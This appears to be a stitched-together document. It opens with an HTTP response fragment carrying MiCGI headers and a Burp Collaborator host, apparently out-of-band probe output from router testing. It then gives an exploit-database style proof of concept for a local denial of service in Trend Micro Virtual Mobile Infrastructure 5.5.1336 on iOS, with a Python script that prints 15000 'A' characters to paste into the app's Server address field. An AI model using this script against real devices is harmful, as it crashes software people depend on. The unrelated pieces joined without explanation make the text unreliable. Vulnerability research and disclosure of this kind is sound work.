MiCGI-Http-Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
MiCGI-Server-Ip: 192.168.31.1
MiCGI-Server-Port: 80
MiCGI-Status: AUTOPROXY
MiCGI-Preload: no

<html><body>x4e809xt6zpgky5b16f6dezjlglgkugifigz</body></html>

# Exploit Title: Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-01
# Vendor Homepage: http://www.trendmicro.com.tr/media/ds/virtual-mobile-infrastructure-datasheet-en.pdf
# Software Link: App Store for iOS devices
# Tested Version: 5.5.1336
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 11.4.1

# Steps to Produce the Crash:
# 1.- Run python code: Virtual_Mobile_Infrastructure_5.5.1336.py
# 2.- Copy content to clipboard
# 3.- Open App Vitual Mobile Infrastructure
# 4.- Paste ClipBoard on "Server address"
# 5.- Next
# 6.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 15000
print (buffer)